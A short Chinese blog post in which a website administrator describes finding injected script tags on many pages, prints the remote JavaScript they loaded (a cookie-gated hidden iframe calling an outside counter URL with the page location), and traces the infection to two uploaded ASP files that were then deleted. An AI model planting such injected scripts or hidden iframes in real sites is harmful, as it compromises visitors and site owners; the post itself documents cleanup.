可恶的木马
今天发现网站运行错误,原来的好多网页中都有<script language="javascript" src="http://css2.viens.la/css.js?width=700&height=600&keyword=uf556"></script>
<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>
这两段代码,也就是所谓的挂马。
我将两个js下载下来后发现两个js内容一样如下:
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&
refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&
language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
经过Google搜索以及监视网站运行情况,确定是其中一个网站为中毒源,网站是个asp,觉得可能是上传文件,然后运行引起的。然后检查上传文件夹,发现里面多了两个asp文件,打开一看果然是,把这两个文件删除,然后替换嵌入网页的<script>代码,网站恢复正常。
